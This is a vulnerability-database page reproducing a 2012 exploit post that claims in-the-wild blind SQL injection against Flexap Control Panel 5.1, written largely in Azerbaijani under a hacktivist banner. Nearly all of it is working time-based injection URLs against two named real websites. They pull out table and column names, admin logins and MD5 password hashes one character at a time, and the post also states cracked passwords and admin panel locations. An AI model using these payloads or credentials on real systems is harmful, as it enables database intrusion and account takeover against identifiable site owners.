Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Flexap Control Panel 5.1 Blind SQL Injection Vulnerability

🗓️ 04 Sep 2012 00:00:00Reported by AkaStepType 
zdt
 zdt🔗 0day.today👁 46 Views

Control Panel version 5.1 Blind SQL Injection Vulnerability in flexap.a

Code
=====================================================
Vulnerable software: Control Panel version 5.1 
Vendor: http://www.flexap.am/
Vuln type: Blind SQL Injection
Software License: Commercial
Software: Control Panel version 5.1 
Discovered and Exploited in Wild
=====================================================
Dork: Developed by flexap.am

=====================================================


************** FOR OUR BRO RAMIL SEFEROV! ************************
@OPERATION BY AZERBAIJAN BLACK HATZ: *WIPEN'EM purgens!*
I'M=> AkaStep<= RESPONSIBLE FOR EVERYTHING IN THIS advisory=
********************** REALLY! ********************************************
******************ENJOY MAXIMALLY**************************************



=====================================================




http://dua.am/cms <=Admin panel

Real exploitation example:

Time Based Always RuleZ!

//TRUE

http://www.dua.am/am/news/50'or sleep(10)-- and 5='5/

cms: http://www.dua.am/



//TRUE

www.dua.am/am/news/50' or (select if(substr(column_name,1,13)='ulist_login',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 3,1)-- AnD  5='5




logini cekek:


http://www.dua.am/am/news/50%27%20or%20%28select%20if%28substr%28%60ulist_login%60,1,1%29=%27a%27,sleep%281%29,0%29%20from%20ulist%20limit%201%29--%20AnD%20%205=%275

1-ci simvol:


a

//TRUE
http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,1,1)='a',sleep(1),0) from ulist limit 1)-- AnD  5='5

 
 
 2-ci simvol: d
 
 http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,2,1)='d',sleep(1),0) from ulist limit 1)-- AnD  5='5
 
 
 3-cu simvol:   m
 
 http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,3,1)='m',sleep(1),0) from ulist limit 1)-- AnD  5='5
 
 
 4-cu simvol:  d
 
 
 http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,4,1)='d',sleep(1),0) from ulist limit 1)-- AnD  5='5
 
 
 
 5-ci simvol:   u
 
 
 http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,5,1)='u',sleep(1),0) from ulist limit 1)-- AnD  5='5
 
 
 6-ci simvol:   a
 
 
 http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,6,1)='a',sleep(1),0) from ulist limit 1)-- AnD  5='5
 
 
 Login:  admdua
 
 
 //TRUE
 http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,1,15)='admdua',sleep(1),0) from ulist limit 1)-- AnD  5='5
 
 
 
 
 Passi cekmeye getdik!
 
 
 
 Pass deyesen ele budur:D 
 http://www.dua.am/am/news/50' or (select if(substr(`ulist_password`,1,33)='9578f5aa427b07bdd3a8549f929a4e31',sleep(1),0) from ulist limit 1)-- AnD  5='5
 
 
 pass: Massword
 
 
 mogin:Massword

===================================================================

Next another Demo:


Adminka: http://mkuzak.am/cms/


//TRUE
http://www.mkuzak.am/am/news/85%27%20or%20sleep%2810%29--%20and%205=%275/



//TRUE
http://www.mkuzak.am/am/news-8%27%20or%20sleep%281%29--%20and%205=%275/



Developed by <a href="http://www.flexap.am"


Bele olmalidir:




http://www.mkuzak.am/am/news/1' or (select if(count(table_name)='10',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61)-- AnD  5='5


24 table varimizdir:

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(count(table_name)='24',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61)-- AnD  5='5


1-ci tablein adi 8 simvolluqdur:


//TRUE

Cekek


1-ci tablein adinin 1ci herfi:   c


//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='c',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- AnD  5='5


2-ci simvolu (1-ci tablein adinin) :   a


http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='a',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- AnD  5='5

3-cu simvolu:   t

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,3,1)='t',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- AnD  5='5



Category?

Yoxlayaq:

1-ci tablein adi: category
//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,12)='category',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- AnD  5='5



Ok indi qisaltmaga calisaq metodu:

pattern: adm
user

uzre:



http://www.mkuzak.am/am/news/1' or (select if(length(table_name)>'10',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD  5='5


http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,3)='adm',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- AnD  5='5



adm uzre butun neticeler LIMIT offsetlerde hamisi FALSE

qaldi user uzre. Edit: Ele user uzre de netice falsedir butun cehdlerde.


cms uzre axtaraq.


(select if(substr(table_name,1,3)='acms',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD  5='5


Alinmasa isimiz uzanir.




ele uzandida isimiz icini sikim!



2-ci table name:   6 simvol uzunluqludur:



http://www.mkuzak.am/am/news/1' or (select if(length(table_name)='6',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD  5='5


Cekek bu sikilmisi de.


1-ci simvolu: c

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='c',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD  5='5

2-ci simvolu: o

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='o',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD  5='5


config?

2ci table name config:

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,8)='config',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD  5='5



=======================================================================
3-cu table name:   3 simvol:

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(length(table_name)='3',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 3,1)-- AnD  5='5

1-ci simvolu:   f


//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='f',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 3,1)-- AnD  5='5



2-ci simvolu:   a


http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='a',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 3,1)-- AnD  5='5


3-cu simvolu:  q

//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,3,1)='q',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 3,1)-- AnD  5='5


3-cu table name: faq

======================================================================


4-cu table name: 15 simvol uzunluqludur:




http://www.mkuzak.am/am/news/1' or (select if(length(table_name)='15',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 4,1)-- AnD  5='5


1-ci simvolu: f

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='f',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 4,1)-- AnD  5='5

2-ci simvolu:


a

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='a',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 4,1)-- AnD  5='5


sikdirecek  bu table
=======================================================================


//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='u',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD  5='5

u herfine nese verir.


10 simvolludur:


//TRUE


http://www.mkuzak.am/am/news/1' or (select if(length(table_name)='10',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD  5='5


1-ci simvolu: u

2-ci simvolu: l
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='l',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD  5='5

3-cu simvolu: i

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,3,1)='i',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD  5='5

4-cu simvol:  s

s

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,4,1)='s',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD  5='5


5-ci simvolu:  t

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,5,1)='t',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD  5='5

6-ci simvol: _

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,6,1)='_',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD  5='5

7-ci simvol:  t

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,7,1)='t',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD  5='5


8-ci simvol:  y

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,8,1)='y',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD  5='5

9-cu simvol: p

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,9,1)='p',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD  5='5

10-ci simvol:

table_name:  ulist_type

===================================================================================================================
novbeti table:
//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='u',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 22,1)-- AnD  5='5

Bu da
//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='u',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 21,1)-- AnD  5='5



Bu da

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='u',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 20,1)-- AnD  5='5


Bu da

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='u',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 19,1)-- AnD  5='5



============================= birinci herfi u olmaqla cemi 5 simvoldan ibaretdir. May be users?======================

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(length(table_name)='5',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 19,1)-- AnD  5='5


2-ci herfi: l

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='l',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 19,1)-- AnD  5='5

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,6)='ulist',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 19,1)-- AnD  5='5


TABLE_NAME ulist

0x756C697374




http://www.mkuzak.am/am/news/1' or (select if(count(*)='1',sleep(1),0) from ulist)-- AnD  5='5



//TRUE

http://www.mkuzak.am/am/news/1' or (select if(count(*)='2',sleep(1),0) from ulist)-- AnD  5='5

Ola bilsin ele budur cms-in adminkasina girmek ucun table
2 yazi var orda

COlumnlarina baxaq gorek ne veziyyetdedir.



http://www.mkuzak.am/am/news/1' or (select if(count(column_name)='1',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374)-- AnD  5='5

ulist tableinda 8 column var:

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(count(column_name)='8',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374)-- AnD  5='5

1-ci column name: 8 simvoldan ibaretdir

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(length(column_name)='8',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD  5='5

ulist tableinda 1-ci colum namein 1-ci simvolu:  u

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,1)='u',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD  5='5

2-ci simvolu:  l

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,2,1)='l',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD  5='5


3-cu simvolu:  i


http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,3,1)='i',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD  5='5


4-cu simvolu:  s

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,4,1)='s',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD  5='5

5-ci simvolu:    t

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,5,1)='t',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD  5='5

6-ci simvol:   _


http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,6,1)='_',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD  5='5


1-ci column name full sekilde:

ulist_id
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,12)='ulist_id',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD  5='5


column prefix ulist_     dir demeli:


//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,6)='ulist_',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1,1)-- AnD  5='5


Getdik bu sikilmis 2-ci columnu cekmeye:

name Uzunlugu 13 simvoldur:


//TRUE

http://www.mkuzak.am/am/news/1' or (select if(length(column_name)='13',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1,1)-- AnD  5='5



http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,7,1)='t',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1,1)-- AnD  5='5


hal hazirda bu sekildedir:

ulist_t



//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,8,1)='y',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1,1)-- AnD  5='5

hal hazirda bu sekildedir:

ulist_typeXXX


axira getmirem imho sikdirmelidir bu column name

Novbeti column blyaaaaaaaaaaaaaaaaaaaaaa:(



============================================

3-cu column:

10 simvoldur name length
http://www.mkuzak.am/am/news/1' or (select if(length(column_name)='10',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD  5='5



//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,7,1)='n',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD  5='5

ulist_n



//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,8,1)='a',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD  5='5

ulist_na



//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,9,1)='m',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD  5='5

ulist_nam






http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,10,1)='e',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD  5='5


ulist_name


//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,11)='ulist_name',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD  5='5


==============================================================


Novbeti column:

11 simvolludur column name length

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(length(column_name)='11',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 3,1)-- AnD  5='5


Prefixi: ulist_      (-6)

Offset 7 den baslanmalidir substr()-de


//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,13)='ulist_login',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 3,1)-- AnD  5='5

ulist_login



password-da cixsa sikmeye basliyardiq blyaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:(



Deyesen artiq duz tutmusam bunu:


http://www.mkuzak.am/am/news/1' or (select if(length(column_name)='14',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 4,1)-- AnD  5='5

Yeah!

Sikdik!

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,15)='ulist_password',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 4,1)-- AnD  5='5


ulist_password


Neyimiz var:

ulist table-i

hemin tableda:

ulist_login
ulist_password

columnlari


Basliyaq...




http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,1,15)='admin',sleep(1),0) from ulist limit 1)-- AnD  5='5



select length(`ulist_login`) from ulist limit 1


1-ci login name 9 simvoldan ibaretdir:

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(length(`ulist_login`)='9',sleep(1),0) from ulist limit 1)-- AnD  5='5


--------------------------------------------------------------------------------------------------------------------------------------------------------------
Loginin 1-ci simvolu:  a

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,1,1)='a',sleep(1),0) from ulist limit 1)-- AnD  5='5



2ci simvolu:   d

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,2,1)='d',sleep(1),0) from ulist limit 1)-- AnD  5='5

3cu simvol: m

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,3,1)='m',sleep(1),0) from ulist limit 1)-- AnD  5='5

4-cu simvol:   m

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,4,1)='m',sleep(1),0) from ulist limit 1)-- AnD  5='5

5-ci simvol:


Login bu ola biler: admmkuzak


//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,1,11)='admmkuzak',sleep(1),0) from ulist limit 1)-- AnD  5='5





Getdik passi firlatmaga...


Amma 1-ci sifrelenme algosunu yoxlayaq.

http://www.mkuzak.am/am/news/1' or (select if(length(`ulist_password`)='32',sleep(1),0) from ulist limit 1)-- AnD  5='5


//TRUE


MD5 SIFRELENME ALGOSU:

http://www.mkuzak.am/am/news/1' or (select if(length(`ulist_password`)='32',sleep(1),0) from ulist limit 1)-- AnD  5='5




http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,1,1)='0',sleep(1),0) from ulist limit 1)-- AnD  5='5




admmkuzak adli soska xacikin parolu:


================================================

1-ci simvol: 9


//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,1,1)='9',sleep(1),0) from ulist limit 1)-- AnD  5='5

================================================

2-ci simvol:    5


//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,2,1)='5',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================

3-cu simvol:   7


//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,3,1)='7',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================

4-cu simvol:   8

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,4,1)='8',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================

5-ci simvol:   f

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,5,1)='f',sleep(1),0) from ulist limit 1)-- AnD  5='5



================================================

6-ci simvol:    5


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,6,1)='5',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================

7-ci simvol:   a

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,7,1)='a',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================


8-ci simvol:  a

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,8,1)='a',sleep(1),0) from ulist limit 1)-- AnD  5='5




================================================

9-cu simvol:   4


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,9,1)='4',sleep(1),0) from ulist limit 1)-- AnD  5='5



================================================

10-cu simvol:  2

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,10,1)='2',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================

11-ci simvol:   7

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,11,1)='7',sleep(1),0) from ulist limit 1)-- AnD  5='5

================================================

12-ci simvol:   b (yoxla sonra)

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,12,1)='b',sleep(1),0) from ulist limit 1)-- AnD  5='5




================================================

13-cu simvol:    0

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,13,1)='0',sleep(1),0) from ulist limit 1)-- AnD  5='5

================================================

14-cu simvol:   7

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,14,1)='7',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================

15-ci simvol:   b  (yoxla sonra)


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,15,1)='b',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================

16-ci simvol:   d

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,16,1)='d',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================


17-ci simvol:     d


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,17,1)='d',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================


18-ci simvol:    3


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,18,1)='3',sleep(1),0) from ulist limit 1)-- AnD  5='5

================================================


19-cu simvol:   a


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,19,1)='a',sleep(1),0) from ulist limit 1)-- AnD  5='5

================================================


20-ci simvol:   8

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,20,1)='8',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================

21-ci simvol:     5

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,21,1)='5',sleep(1),0) from ulist limit 1)-- AnD  5='5



================================================
yoxla sonra
22-ci simvol:    4

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,22,1)='4',sleep(1),0) from ulist limit 1)-- AnD  5='5

================================================


23-cu simvol:   9

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,23,1)='9',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================
yoxla sonra


24-cu simvol:   f

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,24,1)='f',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================

25-ci simvol:    9


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,25,1)='9',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================


26-ci simvol:    2

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,26,1)='2',sleep(1),0) from ulist limit 1)-- AnD  5='5

================================================

27-ci simvol:    9


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,27,1)='9',sleep(1),0) from ulist limit 1)-- AnD  5='5

================================================
yoxla sonra
28-ci simvol:   a


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,28,1)='a',sleep(1),0) from ulist limit 1)-- AnD  5='5

================================================

29-cu simvol:   4

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,29,1)='4',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================

30-cu simvol:  e

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,30,1)='e',sleep(1),0) from ulist limit 1)-- AnD  5='5

================================================


31-ci simvol:     3


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,31,1)='3',sleep(1),0) from ulist limit 1)-- AnD  5='5



================================================

32-ci simvol:       1


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,32,1)='1',sleep(1),0) from ulist limit 1)-- AnD  5='5


================================================
Login:  admmkuzak

MD5 HASH:   9578f5aa427b07bdd3a8549f929a4e31


PASS: Massword
Yoxlaya hashi:

//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,1,33)='9578f5aa427b07bdd3a8549f929a4e31',sleep(1),0) from ulist limit 1)-- AnD  5='5


Blyaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa  http://www.mkuzak.am/cms/ de deyir parol sehvdir:(


Belke role yoxdur bu userde?


2-ci user de olmalidir bu table da.


Variant yoxdur cekek:*(




Ikinci user name ucun:


http://www.mkuzak.am/am/news/1' or (select if(length(`ulist_login`)='5',sleep(1),0) from ulist limit 1,1)-- AnD  5='5




2-ci userin logininin

1-ci herfi:


m

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,1,1)='m',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


2-ci herfi:  o


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,2,1)='o',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


3-cu herfi:   g

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,3,1)='g',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


4-cu herfi:     i


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,4,1)='i',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



5-ci simvol: n



http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,5,1)='n',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



umumi username ikinci user ucun:


mogin

Yoxlayaq?


//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,1,6)='mogin',sleep(1),0) from ulist limit 1,1)-- AnD  5='5




Passi getdik: Cekmeye yene blyaaaaaaaaaaaaaaaaa :*(


================================================

1-ci simvol:   e


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,1,1)='e',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

2-ci simvol:      7


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,2,1)='7',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================
yoxla sonra:
3-cu simvol:    9



http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,3,1)='9',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================

4-cu simvol:       d


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,4,1)='d',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================

5-ci simvol:   2

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,5,1)='2',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================


yoxla mutlwq
6-ci simvol:   f

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,6,1)='f',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================





7-ci simvol:    3

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,7,1)='3',sleep(1),0) from ulist limit 1,1)-- AnD  5='5





================================================
yoxla sonra

8-ci simvol:  1

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,8,1)='1',sleep(1),0) from ulist limit 1,1)-- AnD  5='5




================================================


9-cu simvol:   5


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,9,1)='5',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================
10-cu simvol:    e


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,10,1)='e',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

11-ci simvol:     9

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,11,1)='9',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

12-ci simvol:     9

